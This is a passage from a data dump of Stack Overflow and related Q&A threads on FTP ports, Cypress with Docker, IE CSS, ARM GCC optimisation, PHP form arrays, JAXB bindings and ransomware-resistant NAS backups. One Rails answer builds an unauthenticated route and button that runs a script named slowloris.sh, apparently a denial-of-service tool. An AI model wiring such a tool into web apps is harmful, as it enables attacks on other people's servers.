so you really should avoid using it.\nAnswer: ftp uses more than one port - control and data port...\nControl port - 21\nData port - 20\nOpen port 20, as you have done 21.\nComment: stil didnt fix it sadly. connecting with either port 20 or 21 threw the same connection refused error\nComment: what did you do to open the port? Can you post the output of `ss -tuln`... and it may just be semantics here, but it's not \"either\" port, FTP uses both ports.\nComment: connection refused means there's no FTP server listening on those ports. Did you install an FTP server software?\n","meta":{"source":"askubuntu","title":"Ubuntu 16.04 Can't connect with FTP, only SFTP","dup_signals":{}},"subset":"stackexchange"} +{"text":"Cypress could not verify that this server is running when using Docker and Docker Compose\n\nQuestion: I currently have three docker containers running:\n\nDocker container for the front-end web app (exposed on port 8080)\nDocker container for the back-end server (exposed on port 5000)\nDocker container for my MongoDB database.\n\nAll three containers are working perfectly and when I visit http:\/\/localhost:8080, I can interact with my web application with no issues.\nI'm trying to set up a fourth Cypress container that will run my end to end tests for my app. Unfortunately, this Cypress container throws the below error, when it attempts to run my Cypress tests:\n<code>cypress | Cypress could not verify that this server is running:\ncypress |\ncypress | > http:\/\/localhost:8080\ncypress |\ncypress | We are verifying this server because it has been configured as your `baseUrl`.\ncypress |\ncypress | Cypress automatically waits until your server is accessible before running tests.\ncypress |\ncypress | We will try connecting to it 3 more times...\ncypress | We will try connecting to it 2 more times...\ncypress | We will try connecting to it 1 more time...\ncypress |\ncypress | Cypress failed to verify that your server is running.\ncypress |\ncypress | Please start this server and then run Cypress again.\n<\/code>\nFirst potential issue (which I've fixed)\nThe first potential issue is described by this SO post, which is that when Cypress starts, my application is not ready to start responding to requests. However, in my Cypress Dockerfile, I'm currently sleeping for 10 seconds before I run my cypress command as shown below. These 10 seconds are more than adequate since I'm able to access my web app from the web browser before the <code>npm run cypress-run-chrome<\/code> command executes. I understand that the Cypress documentation has some fancier solutions for waiting on http:\/\/localhost:8080 but for now, I know for sure that my app is ready for Cypress to start executing tests.\n<code>ENTRYPOINT sleep 10; npm run cypress-run-chrome\n<\/code>\nSecond potential issue (which I've fixed)\nThe second potential issue is described by this SO post, which is that the Docker container's <code>\/etc\/hosts<\/code> file does not contain the following line. I've also rectified that issue and it doesn't seem to be the problem.\n<code>127.0.0.1 localhost\n<\/code>\nDoes anyone know why my Cypress Docker container can't seem to connect to my web app that I can reach from my web browser on http:\/\/localhost:8080?\nBelow is my Dockerfile for my Cypress container\nAs mentioned by the Cypress documentation about Docker, the cypress\/included image already has an existing entrypoint. Since I want to sleep for 10 seconds before running my own Cypress command specified in my package.json file, I've overridden ENTRYPOINT in my Dockerfile as shown below.\n<code>FROM cypress\/included:3.4.1\n\nCOPY hosts \/etc\/\n\nWORKDIR \/e2e\n\nCOPY package*.json .\/\n\nRUN npm install --production\n\nCOPY . .\n\nENTRYPOINT sleep 10; npm run cypress-run-chrome\n<\/code>\nBelow is the command within my package.json file that corresponds to <code>npm run cypress-run-chrome<\/code>.\n<code>\"cypress-run-chrome\": \"NODE_ENV=test $(npm bin)\/cypress run --config video=false --browser chrome\",\n<\/code>\nBelow is my docker-compose.yml file that coordinates all 4 containers.\n<code>version: '3'\nservices:\n web:\n build:\n context: .\n dockerfile: .\/docker\/web\/Dockerfile\n container_name: web\n restart: unless-stopped\n ports:\n - \"8080:8080\"\n volumes:\n - .:\/home\/node\/app\n - node_modules:\/home\/node\/app\/node_modules\n depends_on:\n - server\n environment:\n - NODE_ENV=testing\n networks:\n - app-network\n\n db:\n build:\n context: .\n dockerfile: .\/docker\/db\/Dockerfile\n container_name: db\n restart: unless-stopped\n volumes: \n - dbdata:\/data\/db\n ports:\n - \"27017:27017\"\n networks:\n - app-network\n\n server:\n build:\n context: .\n dockerfile: .\/docker\/server\/Dockerfile\n container_name: server\n restart: unless-stopped\n ports:\n - \"5000:5000\"\n volumes:\n - .:\/home\/node\/app\n - node_modules:\/home\/node\/app\/node_modules\n networks:\n - app-network\n depends_on:\n - db\n command: .\/wait-for.sh db:27017 -- nodemon -L server.js\n\n cypress:\n build:\n context: .\n dockerfile: Dockerfile\n container_name: cypress\n restart: unless-stopped\n volumes:\n - .:\/e2e\n depends_on:\n - web\n networks:\n - app-network\n\nnetworks:\n app-network:\n driver: bridge\n\nvolumes:\n dbdata:\n node_modules:\n<\/code>\nBelow is what my hosts file looks like which is copied into the Cypress Docker container.\n<code>127.0.0.1 localhost\n<\/code>\nBelow is what my cypress.json file looks like.\n<code>{\n \"baseUrl\": \"http:\/\/localhost:8080\",\n \"integrationFolder\": \"cypress\/integration\",\n \"fileServerFolder\": \"dist\",\n \"viewportWidth\": 1200,\n \"viewportHeight\": 1000,\n \"chromeWebSecurity\": false,\n \"projectId\": \"3orb3g\"\n}\n<\/code>\nComment: `localhost` in Docker is always \"this container\". You can use the names of the service blocks in the `docker-compose.yml` as hostnames; `http:\/\/web:8080`.\nComment: @DavidMaze Yep, this was absolutely the problem. If you write up that as the solution I'm happy to accept it as the answer. I would imagine this question and solution would be helpful to other Docker newbies like myself.\nComment: THAT, i did not see this in the docs somewhere\nAnswer: <code>localhost<\/code> in Docker is always \"this container\". Use the names of the service blocks in the docker-compose.yml as hostnames, i.e., http:\/\/web:8080\n(Note that I copied David Maze's answer from the comments)\nComment: Life saver, thank you! It took me days to find your answer, I wonder how it was hidden so well. I am thinking to go back to all the SO questions I reviewed and place a link to this...\nComment: I am facing the same issue and I understood whats the issue but what is the solution to it? What to edit in the docker-compose.yml file so that the local host of cypress points to localhost of web.\nComment: @Chromeium -> Use the names of the service blocks in the docker-compose.yml as hostnames, i.e., http:\/\/web:8080\nComment: cypress container: environment:(newline) - CYPRESS_baseUrl=http:\/\/web\n","meta":{"source":"stackoverflow","title":"Cypress could not verify that this server is running when using Docker and Docker Compose","dup_signals":{}},"subset":"stackexchange"} +{"text":"Elements not displaying correctly in IE\n\nQuestion: I am trying to display a form in IE, but for some reason, the layout is broken as you can see from the picture. I have tried various fixes inc, clears, display:block options, but still the layout breaks. If this was in FF, I could use firebug to trace where it is breaking but IE has no such debug tool, hence the post. I would be grateful if someone could show me my error. Thanks\n<code>.adduserform label\n {\n\n display:block;\n width:130px;\n float:left;\n font-weight:normal;\n font-size:12px;\n padding: 4px 0 0 40px;\n z-index:1000;\n clear:both;\n line-height: 20px;\n\n }\n\n.adduserform select\n {\n\n width: 130px;\n float:left\n font-family:Calibri, Arial, Helvetica, sans-serif;\n font-size:12px;\n outline:none;\n margin-top: 5px;\n clear:both;\n }\n\n <div id=\"coname\">\n <div id=\"AUSR_address\"><\/div>\n <dl>\n <dt>\n <label for=\"AUSR_name\" class=\"opt\">Full Name:<\/label>\n <\/dt>\n <dd>\n <input id=\"AUSR_name\" name=\"AUSR_name\" type=\"text\" size=\"32\" maxlength=\"128\" value = \"\" \/>\n <\/dd>\n <\/dl>\n <\/div>\n<\/code>\n\n+++SOLUTION+++\n<code>div#coname {\n\n clear:both;\n}\n<\/code>\nComment: @martin. oopps..sorry doing it know. thanks\nComment: Some versions of IE do have a similar tool to Firebug, try pressing F12\nComment: @shane I have tried that but found it more of a hindurance than a helpful tool. Every time you try something, just keeps refreshing the browser. What we need is firebug for IE. I know there is a cut down version so may check it out. Thanks\nAnswer: IE has developer toolbar. If you press F12 it should bring it up and should help you find your issue. You can also use it to view your pages in different IE version modes.\nComment: John I am not too familiar with IE Toolbar, apart from the fact it seems to take forever to update itself. How could I use it to help with my issue? Thanks\nComment: It should pretty much the same as firebug. If you use the element selector you can use the attributes section to add styles to your elements so you can preview what Changes look like. With your code I'd be tempted to put your labels and inputs inside a dive each and have a float: left and clear both on the label div.\nAnswer: I would start out by making sure you have a doctype at the top like so:\n<code><!DOCTYPE html>\n<\/code>\nWithout specifying a doctype, IE reverts to quirks mode and things can get a little ugly. An example above is for HTML5, but there are quite a few more. For a full list of possible doctypes, refer here: http:\/\/www.w3.org\/QA\/2002\/04\/valid-dtd-list.html\nIronically, there is a website called http:\/\/www.quirksmode.org\/ which keeps track of various compatibility issues across browsers. Might find it helpful in the near future.\nAnswer: IE Developer Toolbar\n\nNewer Versions (press F12)\nOlder Versions (go here and download)\n\nFirebug Lite\n\u00a0 \u00a0 Many of the features in FF's firebug can be extended to other browsers using this bookmarklet\n\nDo you have an online version of this page that we could actually see? There could be many reasons, which could be width-related to something messed up with the block model.\nComment: vol7ron See solution I have managed to get it working with. Thanks\nComment: and that is why you did not have enough info. that is also a misuse of the `dl`, `dt`, `dd` tag.\n","meta":{"source":"stackoverflow","title":"Elements not displaying correctly in IE","dup_signals":{}},"subset":"stackexchange"} +{"text":"ARM GCC hardfault when using -O2\n\nQuestion: When using ARM GCC g++ compiler with optimization level -O2 (and up) this code:\n<code>void foo(void)\n{\n DBB(\"@0x%08X: 0x%08X\", 1, *((uint32_t *)1));\n DBB(\"@0x%08X: 0x%08X\", 0, *((uint32_t *)0));\n}\n<\/code>\nCompiles to:\n<code>0800abb0 <_Z3foov>:\n 800abb0: b508 push {r3, lr}\n 800abb2: 2301 movs r3, #1\n 800abb4: 4619 mov r1, r3\n 800abb6: 681a ldr r2, [r3, #0]\n 800abb8: 4802 ldr r0, [pc, #8] ; (800abc4 <_Z3foov+0x14>)\n 800abba: f007 fa83 bl 80120c4 <debug_print_blocking>\n 800abbe: 2300 movs r3, #0\n 800abc0: 681b ldr r3, [r3, #0]\n 800abc2: deff udf #255 ; 0xff\n 800abc4: 08022704 stmdaeq r2, {r2, r8, r9, sl, sp}\n<\/code>\nAnd this gives me hardfault at undefined instruction @0x0800abc2.\nAlso, if there is more code after that, it is not compiled into final binary.\nThe question is why compiler generates it like that, why undefined istruction?\nBy the way, it works fine for stuff like this:\n<code>...\nuint32_t num = 2;\nnum -= 2;\nDBB(\"@0x%08X: 0x%08X\", 0, *((uint32_t *)num));\n...\n<\/code>\nCompiler version:\n<code>arm-none-eabi-g++.exe (GNU Tools for ARM Embedded Processors 6-2017-q2-update) 6.3.1 20170620 (release) [ARM\/embedded-6-branch revision 249437]\n<\/code>\nComment: what instruction(s) do you think it is? Looks undefined.\nComment: I ran into this today when writing a Bootloader. In my case I'm accessing App at flash addr 0x0. Was working in debug build but not in release build due to `-Os` optimization. Adding `-fno-delete-null-pointer-checks` to the release build was the fix!\nAnswer: You can disable this (and verify this answer) by using <code>-fno-delete-null-pointer-checks<\/code>\nThe pointer you are passing has a value which matches the null pointer, and the compiler can see that from static analysis, so it faults (because that is the defined behaviour).\nIn your second example, the static analysis doesn't identify a NULL.\n","meta":{"source":"stackoverflow","title":"ARM GCC hardfault when using -O2","dup_signals":{}},"subset":"stackexchange"} +{"text":"run bash script from onclick in erb view\n\nQuestion: Hi what I'm trying to do is run a bash script when someone clicks on an image. This is being done within an .erb view in Ruby on rails and the server this is running does have php installed. Thank you for reading and have a wonderful day!\n<code><%= image_tag(\"longbeards.jpg\", :class => \"homepage-leftsidepicture\", onclick:'<?php exec(\"\/home\/ncs\/slowloris.sh\");?>' ) %>\n<\/code>\nEDIT: I was unable to use the onclick statement from the first answer I got. However, I made a javascript function that calls the statement. Now I get this error that says \"No route matches {:action=>\"call_script\", :controller=>\"script\"}, missing required keys: [:script_id]\"\nComment: You cannot run PHP code from a HTML element in a browser. PHP only runs on the server. The `onclick` attribute will run only run javascript (on the browser)\nAnswer: You would need to create a controller action that calls the BASH script, so in your controller:\nscript_controller.rb:\n<code>class ScriptController < ApplicationController\n def call_script\n `\/home\/ncs\/slowloris.sh`\n end\nend\n<\/code>\nYou would then need to create a route to this action, like so:\nroutes.rb:\n<code> get 'call_script' => 'script#call_script', as: 'call_script'\n<\/code>\nFinally you would need to call this new endpoint from your image.\n<code><%= image_tag(\"longbeards.jpg\", :class => \"homepage-leftsidepicture\", onclick: \"window.open('#{call_script_url}', '_blank')\" ) %>\n<\/code>\nComment: Is this assuming you're using rails 5.x.x?\nComment: I don't _think_ any of that is Rails 5 specific\nComment: Alright, I did what you said in your answer and I got this error \"No route matches {:action=>\"call_script\", :controller=>\"script\"}, missing required keys: [:script_id]\"\nComment: I had a syntax error in there and was missing a : on the 'as', and was incorrecting using <%= %> in window.open. I updated the answer, and I also confirmed this works in Rails 4\nComment: Okay that definitely fixed the missing required keys issues. So I was able to get to the call script function under my script controller. However, I don't believe my script is running when I reach that webpage. Would the system() work in this case?\nComment: Scratch that last comment as I just noticed it was running my bash script. Although it will only run the first line and stop there\n","meta":{"source":"stackoverflow","title":"run bash script from onclick in erb view","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to get a form input array into a PHP array\n\nQuestion: I have a form like the one below which is posted to contacts.php, and the user can dynamically add more with jQuery.\n<code><input type=\"text\" name=\"name[]\" \/>\n<input type=\"text\" name=\"email[]\" \/>\n\n<input type=\"text\" name=\"name[]\" \/>\n<input type=\"text\" name=\"email[]\" \/>\n\n<input type=\"text\" name=\"name[]\" \/>\n<input type=\"text\" name=\"email[]\" \/>\n<\/code>\nIf I echo them out in PHP with the code below,\n<code>$name = $_POST['name'];\n$email = $_POST['account'];\n\nforeach($name as $v) {\n print $v;\n}\n\nforeach($email as $v) {\n print $v;\n}\n<\/code>\nI will get something like this:\n\nname1name2name3email1email2email3\n\nHow can I get those arrays into something like the code below?\n<code>function show_Names($n, $m)\n{\n return(\"The name is $n and email is $m, thank you\");\n}\n\n$a = array(\"name1\", \"name2\", \"name3\");\n$b = array(\"email1\", \"email2\", \"email3\");\n\n$c = array_map(\"show_Names\", $a, $b);\nprint_r($c);\n<\/code>\nso my output is like this:\n\nThe name is name1 and email is email1, thank you\nThe name is name2 and email is email2, thank you\nThe name is name3 and email is email3, thank you\nAnswer: They are already in arrays: <code>$name<\/code> is an array, as is <code>$email<\/code>\nSo all you need to do is add a bit of processing to attack both arrays:\n<code>$name = $_POST['name'];\n$email = $_POST['account'];\n\nforeach( $name as $key => $n ) {\n print \"The name is \" . $n . \" and email is \" . $email[$key] . \", thank you\\n\";\n}\n<\/code>\nTo handle more inputs, just extend the pattern:\n<code>$name = $_POST['name'];\n$email = $_POST['account'];\n$location = $_POST['location'];\n\nforeach( $name as $key => $n ) {\n print \"The name is \" . $n . \", email is \" . $email[$key] .\n \", and location is \" . $location[$key] . \". Thank you\\n\";\n}\n<\/code>\nComment: Basically, you just extend the pattern. See my edit above...any additional inputs will also be arrays when you assign them from $_POST (assuming there are multiple inputs with that name in the html, as you did with these fields).\nComment: Jeffrey, I wonder if I can trust the ordering of the arrays. That is, are we sure that `$emails[1]` corresponds to the user named `$name[1]`? I think I ran into problems with this in the past but I might be wrong. Thanks\nComment: @bruciasse - The way that the server handles input arrays like this will vary from one web server to another (different OSes implement things differently when it comes to fine grained details like this), however every platform I have employed these techniques on is consistent within itself (i.e. the ordering is the same every time). It is possible that a browser could mix-up the order of the request variables before passing the request to the server, but I would expect this to be fairly unusual. The final issue you could face is that of the html being mixed in a strange order and CSS adjusting\nComment: thank you, what if i added another input like location[], how could i add that in as well?\nComment: ... the positioning. If your page was like that, it would certainly see some strange issues w\/r\/t ordering of the arrays.\nComment: @JeffreyBlake, there is an issue with this, `foreach` uses an array of values, doing `$name = $_POST['name'];` would leave this as a string so the system will break as soon as you try to traverse it as an array rather than a string, did you mean `$name[] = $_POST['name'];` instead of this? (Sorry it's belated, just rather misleading when I saw this...)\nComment: @SamSwift You're assuming that `$_POST['name']` is a string. In the case that your page has multiple `` elements with the same value for name, that is not the case. When that happens, PHP will load the `$_POST` variable as an array. It is true that this code might not work as desired in the case that there is only one input element. If you're doing something with a dynamically generated form that can have any number of inputs, you might have to add processing for the cases of having zero or one inputs, as opposed to many, however that is outside the scope of this question\/answer.\nComment: how about input type file? could you help me with this ty\nAnswer: E.g. by naming the fields like\n<code><input type=\"text\" name=\"item[0][name]\" \/>\n<input type=\"text\" name=\"item[0][email]\" \/>\n\n<input type=\"text\" name=\"item[1][name]\" \/>\n<input type=\"text\" name=\"item[1][email]\" \/>\n\n<input type=\"text\" name=\"item[2][name]\" \/>\n<input type=\"text\" name=\"item[2][email]\" \/>\n<\/code>\n(which is also possible when adding elements via JavaScript)\nThe corresponding PHP script might look like\n<code>function show_Names($e)\n{\n return \"The name is $e[name] and email is $e[email], thank you\";\n}\n\n$c = array_map(\"show_Names\", $_POST['item']);\nprint_r($c);\n<\/code>\nComment: Hi Thanks for this, how do you do the php script in laravel function show_Names($e)\n{\n return \"The name is $e[name] and email is $e[email], thank you\";\n}\n\n$c = array_map(\"show_Names\", $_POST['item']);\nprint_r($c);\nAnswer: You could do something such as this:\n<code>function AddToArray ($post_information) {\n \/\/Create the return array\n $return = array();\n \/\/Iterate through the array passed\n foreach ($post_information as $key => $value) {\n \/\/Append the key and value to the array, e.g.\n \/\/$_POST['keys'] = \"values\" would be in the array as \"keys\"=>\"values\"\n $return[$key] = $value;\n }\n \/\/Return the created array\n return $return;\n}\n<\/code>\nThe test with:\n<code>if (isset($_POST['submit'])) {\n var_dump(AddToArray($_POST));\n}\n<\/code>\nThis for me produced:\n<code>array (size=1)\n 0 =>\n array (size=5)\n 'stake' => string '0' (length=1)\n 'odds' => string '' (length=0)\n 'ew' => string 'false' (length=5)\n 'ew_deduction' => string '' (length=0)\n 'submit' => string 'Open' (length=4)\n<\/code>\nAnswer: You can use an array of fieldsets:\n<code><fieldset>\n <input type=\"text\" name=\"item[1]\" \/>\n <input type=\"text\" name=\"item[2]\" \/>\n <input type=\"hidden\" name=\"fset[]\"\/>\n<\/fieldset>\n\n<fieldset>\n <input type=\"text\" name=\"item[3]\" \/>\n <input type=\"text\" name=\"item[4]\" \/>\n <input type=\"hidden\" name=\"fset[]\"\/>\n<\/fieldset>\n<\/code>\nI added a hidden field to count the number of the fieldsets.\nThe user can add or delete the fields and then save it.\nAnswer: I came across this problem as well. Given 3 inputs: field[], field2[], field3[]\nYou can access each of these fields dynamically. Since each field will be an array, the related fields will all share the same array key. For example, given input data:\n\nBob, email@example.com, male\nMark, email@example.com, male\n\nBob and his email and sex will share the same key. With this in mind, you can access the data in a for loop like this:\n<code> for($x = 0; $x < count($first_name); $x++ )\n {\n echo $first_name[$x];\n echo $email[$x];\n echo $sex[$x];\n echo \"<br\/>\";\n }\n<\/code>\nThis scales as well. All you need to do is add your respective array vars whenever you need new fields to be added.\nAnswer: However, VolkerK's solution is the best to avoid miss couple between email and username. So you have to generate HTML code with PHP like this:\n<code><? foreach ($i = 0; $i < $total_data; $i++) : ?>\n <input type=\"text\" name=\"name[<?= $i ?>]\" \/>\n <input type=\"text\" name=\"email[<?= $i ?>]\" \/>\n<? endforeach; ?>\n<\/code>\nChange $total_data to suit your needs. To show it, just like this:\n<code>$output = array_map(create_function('$name, $email', 'return \"The name is $name and email is $email, thank you.\";'), $_POST['name'], $_POST['email']);\necho implode('<br>', $output);\n<\/code>\nAssuming the data was sent using POST method.\nAnswer: This is an easy one:\n<code>foreach($_POST['field'] as $num => $val) {\n print ' ' . $num . ' -> ' . $val . ' ';\n}\n<\/code>\nComment: An explanation would be in order. E.g., what is the idea\/gist? Please respond by [editing (changing) your answer](https:\/\/stackoverflow.com\/posts\/53300708\/edit), not here in comments (***without*** \"Edit:\", \"Update:\", or similar - the answer should appear as if it was written today).\nAnswer: Already is an array.\nMy inputs are:\n<code><input name=\"name[]\" value='joe'>\n<input name=\"lastname[]\" value='doe'>\n<input name=\"name[]\" value='jose'>\n<input name=\"lastname[]\" value='morrison'>\n<\/code>\nIn the $_POST data, returns the following:\n<code>[name] => Array\n (\n [0] => 'joe'\n [1] => 'jose'\n )\n[lastname] => Array\n (\n [0] => 'doe'\n [1] => 'morrison'\n )\n<\/code>\nYou can access to these data, in the following way:\n<code>$names = $_POST['name']\n$lastnames = $_POST['lastname']\n\/\/ accessing\necho $names[0]; \/\/ joe\n<\/code>\nThis way It is very useful for creating pivot tables.\nComment: Please only post a new answer if you have something new and unique to add to the page.\nAnswer: Using this method should work:\n<code>$name = $_POST['name'];\n$email = $_POST['account'];\nwhile($explore=each($email)) {\n echo $explore['key'];\n echo \"-\";\n echo $explore['value'];\n echo \"<br\/>\";\n}\n<\/code>\nComment: Explain your answer step by step\nComment: An explanation would be in order. E.g., what is the idea\/gist? Please respond by [editing (changing) your answer](https:\/\/stackoverflow.com\/posts\/29834972\/edit), not here in comments (***without*** \"Edit:\", \"Update:\", or similar - the answer should appear as if it was written today).\n","meta":{"source":"stackoverflow","title":"How to get a form input array into a PHP array","dup_signals":{}},"subset":"stackexchange"} +{"text":"wsImport: jaxb nameXmlTransform not working: A class\/interface with the same name is already in use\n\nQuestion: I need to generate Java classes from a WSDL file.\nI'm using the <code>jaxws-maven-plugin<\/code> plugin configured in this way:\n<code><plugin>\n <groupId>org.codehaus.mojo<\/groupId>\n <artifactId>jaxws-maven-plugin<\/artifactId>\n <version>2.5<\/version>\n <executions>\n <execution>\n <id>wsimportPhase<\/id>\n <goals>\n <goal>wsimport<\/goal>\n <\/goals>\n <configuration>\n <keep>true<\/keep>\n <verbose>true<\/verbose>\n <packageName>my.package.name<\/packageName>\n <wsdlFiles>\n <wsdlFile>${basedir}\/wsdl\/myWSDL.wsdl<\/wsdlFile>\n <\/wsdlFiles>\n <wsdlLocation>wsdl\/myWSDL.wsdl<\/wsdlLocation>\n <bindingDirectory>wsdl<\/bindingDirectory>\n <bindingFiles>\n <bindingFile>myBinding.xml<\/bindingFile>\n <\/bindingFiles>\n <sourceDestDir>${basedir}\/src\/main\/java<\/sourceDestDir>\n <\/configuration>\n <\/execution>\n <\/executions>\n<\/plugin>\n<\/code>\nAnd I have configured (with some difficulties) the JAXB bindings in this way:\n<code><?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\n<jaxws:bindings version=\"2.1\"\n schemaLocation=\"myWSDL.wsdl\" \n xmlns:xs=\"http:\/\/www.w3.org\/2001\/XMLSchema\"\n xmlns:wsdl=\"http:\/\/schemas.xmlsoap.org\/wsdl\/\"\n xmlns:jaxws=\"http:\/\/java.sun.com\/xml\/ns\/jaxws\"\n xmlns:jaxb=\"http:\/\/java.sun.com\/xml\/ns\/jaxb\">\n <jaxws:bindings node=\"wsdl:definitions\/wsdl:types\/xs:schema\/xs:import\">\n <jaxb:bindings schemaLocation=\"importedXSD_1.xsd\">\n <jaxb:bindings node=\"xs:complexType[@name='DuplicatedType']\">\n <jaxb:schemaBindings>\n <jaxb:nameXmlTransform>\n <jaxb:typeName suffix=\"Suffix1\"\/>\n <jaxb:elementName suffix=\"Suffix1\"\/>\n <\/jaxb:nameXmlTransform>\n <\/jaxb:schemaBindings>\n <\/jaxb:bindings>\n <\/jaxb:bindings>\n <jaxb:bindings schemaLocation=\"importedXSD_2.xsd\">\n <jaxb:bindings node=\"xs:complexType[@name='DuplicatedType']\">\n <jaxb:schemaBindings>\n <jaxb:nameXmlTransform>\n <jaxb:typeName suffix=\"Suffix2\"\/>\n <jaxb:elementName suffix=\"Suffix2\"\/>\n <\/jaxb:nameXmlTransform>\n <\/jaxb:schemaBindings>\n <\/jaxb:bindings>\n <\/jaxb:bindings>\n <\/jaxws:bindings>\n<\/jaxws:bindings>\n<\/code>\nBut when I run <code>mvn install<\/code>, I have the following error:\n<code>[INFO] jaxws:wsimport args: [-keep, -s, '\/workspace\/myproject\/src\/main\/java', -d, '\/workspace\/myproject\/target\/classes', -verbose, -encoding, UTF-8, -Xnocompile, -p, my.package.name, -wsdllocation, wsdl\/myWSDL.wsdl, -b, 'file:\/workspace\/myproject\/src\/main\/resources\/wsdl\/mybinding.xml', \"file:\/workspace\/myproject\/src\/main\/resources\/wsdl\/myWSDL.wsdl\"]\nparsing WSDL...\n\n[ERROR] A class\/interface with the same name \"my.package.name.DuplicatedType\" is already in use. Use a class customization to resolve this conflict.\n<\/code>\nThe XPath finds correctly the needed complexType in the xsd, so I don't understand how to fix it.\nAnswer: I have found the solution combining the solutions explained in these two questions:\nwsimport - how to generate service endpoint classes and JAXB classes in separate projects\/folders\nJAXB schema to Java Different XmlRootElement name and Class name\nI have made the following steps:\n\nI have created two binding files, one for jaxws-binding and the other one for jaxb-binding.\nThese are the two files:\n\njaxws-binding.xml:\n<code><?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<jaxws:bindings version=\"2.1\"\n schemaLocation=\"myWSDL.wsdl\" \n xmlns:xs=\"http:\/\/www.w3.org\/2001\/XMLSchema\"\n xmlns:wsdl=\"http:\/\/schemas.xmlsoap.org\/wsdl\/\"\n xmlns:jaxws=\"http:\/\/java.sun.com\/xml\/ns\/jaxws\"\n xmlns:jaxb=\"http:\/\/java.sun.com\/xml\/ns\/jaxb\">\n <jaxws:bindings node=\"wsdl:definitions\/wsdl:types\/xs:schema\/xs:import\">\n <\/jaxws:bindings>\n<\/jaxws:bindings>\n<\/code>\njaxb-binding.xml:\n<code><?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<jaxb:bindings version=\"1.0\"\n xmlns:jaxb=\"http:\/\/java.sun.com\/xml\/ns\/jaxb\"\n xmlns:xjc=\"http:\/\/java.sun.com\/xml\/ns\/jaxb\/xjc\"\n xmlns:xsd=\"http:\/\/www.w3.org\/2001\/XMLSchema\"> \n <jaxb:bindings schemaLocation=\"importedXSD_1.xsd\" node=\"xsd:complexType[@name='DuplicatedType']\">\n <jaxb:class name=\"DuplicatedTypeSuffix1\"\/>\n <\/jaxb:bindings>\n <jaxb:bindings schemaLocation=\"importedXSD_2.xsd\" node=\"xsd:complexType[@name='DuplicatedType']\">\n <jaxb:class name=\"DuplicatedTypeSuffix2\"\/>\n <\/jaxb:bindings>\n<\/jaxb:bindings>\n<\/code>\n\nI have declared the two binding files in the <code><bindingFiles><\/code> tag of the jaxb-maven-plugin in the pom.xml\nAnswer: I was doing integration with some company and they gave me their WSDL which I had to import into my project.\n\nRunning the below would fail due to naming conflict\n<code>wsimport -keep -verbose http:\/\/ip:port\/path\/service?wsdl<\/code>\n\nI resolved the issue by adding \"-XautoNameResolution\"\n<code>wsimport -keep -verbose -XautoNameResolution http:\/\/ip:port\/path\/service?wsdl<\/code>\n\nAnd that was it to resolve my pain point.\nReference (04-08-2021)\nhttps:\/\/briskwalk.wordpress.com\/2012\/03\/30\/a-classinterface-with-the-same-name-is-already-in-use-error-when-generating-stubs-for-net-service-using-jdk-6-wsimport-command\/\n","meta":{"source":"stackoverflow","title":"wsImport: jaxb nameXmlTransform not working: A class\/interface with the same name is already in use","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to lock down iSCSI mounted NAS against ransomware\n\nQuestion: If you lock down an iSCSI mounted NAS volume (on Windows Server) so that Administrators have read-only access and your backups account has write access to the file system, the Administrator account can always take ownership of files, right? There's always the risk that ransomware will infect the system and perform some privilege escalation, then take ownership of locked down files and directories before encrypting, right?\nHow do you combat this?\nComment: i like optical drive backups. again, after having had moved \"to the cloud\"\nAnswer: There is nothing special about this use case: if you fear that the read-only access can be bypassed using privilege escalation then make sure that privilege escalation is not possible on your system. If you fear that ransomware can infect and harm your system make sure that it does not get to your system. Thus the iSCSI problem is reduced to two other well known problems.\nSince both of these problems which are known to have no perfect solution you should make sure that the single perfect solution against ransomware still works: make regular offline backups.\nAnswer: For this to work, you MUST to implement lockdown on the iSCSI side, not on local side.\nRansomware can ALWAYS bypass local security.\nTheres two ways you could lock it down:\n1: Either you make the iSCSI server completely read-only. To faciliate backup, you instead make so your client \"shares\" the drive (SAMBA, FTP or iSCSI) to the iSCSI server, and then the NAS\/iSCSI server will \"pull\" the data from the client.\n(Note here that its really the iSCSI server that is the client, and your backuped PC that is the server in networking terms, it just to clarify which computers I mean, I use the interchanged role)\nThis data needs to be written in a incremential way, using for example LVM Snapshots or other incremential way to store the information, so even if a ransomware overwrites local files, causing these local files to be pulled to the iSCSI server, these damaged files will NOT damage prior backups.\n2: Another way to solve this, is to make the actual iSCSI endpoint read-write, but the data you write to the actual disk on the iSCSI server, will be incremential. This must be enforced on the server-side, so no matter how hard the ransomware tries to overwrite a file, only the diff will be saved, so you can easily roll-back to the date when the ransomware did NOT overwrite it.\nadvantages:\nIn the first case, you could easily schedule the pull's from the client on the server-side, preventing for example a ransomware from \"bombing\" the NAS drive by writing unneccessary data until the diff file covers the whole NAS drive.\nNo matter how much the ransomware fills your local drive with crap, it will only be pulled like 2 times per day.\nThe second case needs a bit more tough, because in that case, you run the risk that the ransomware will constantly write to the iSCSI endpoint, quickly filling the diff file up. This can mean that a ransomware could secretly fill up the iSCSI endpoint, then hope you don't notice it, and then encrypt the files a month later.\nThats why you need to enforce some sort of staging, so if you have recently written to a file, its diff will instead be overwritten. You can propably code something yourself that enforces this staging with snapshots.\nThink like this, that if you write to file X 15:05, then write again 15:06 and then again on 17:01, then write again 22:10, and you have set the staging on 6 hour, then the NAS should contain the pre-15:05 X base file, then a diff between \"pre-15:05 X and the 17:01 one\" and then a diff between \"07:01 one and 22:10 one\".\nAnyways, make sure to have a reliable notification way from the NAS server to you, for example a GSM modem and SMS communication, that the ransomware cannot touch, that will notify you at for example 75% drive utilitazion on the NAS, so even if the ransomware manages to fill it up, you will get ample warning before its completely filled.\n\nSuper-advanced way to solve it:\n\nYou could use a PXE booter, like iPXE, to boot into a small backup-only operating system, that has the read-write username\/password to your iSCSI NAS, but, At each bootup, it just ask if you want to backup the computer now. Here you could have a PIN code or something for backuping that will only accept 3 retries (before it must be resetted locally at the PXE server), that prevents the ransomware from requesting the backup operating system while Windows is running (which would leak the iSCSI read-write username\/password).\nBy enforcing manual backup, you also prevent the risk that the ransomware overwrites your local data, then your local data to be backuped to the server causing it to overwrite good backups.\nIn this way, you do a \"offline boot\" or \"cold boot\", your main operating system isn't running, and anything malicious inside that cannot run. And in the same way, anything malicious cannot write anything to the backup-only operating system either.\nYour local operating system does only have read-only access username\/password.\n","meta":{"source":"security.stackexchange","title":"How to lock down iSCSI mounted NAS against ransomware","dup_signals":{}},"subset":"stackexchange"} +{"text":"Simple code in Visual Studio 2010 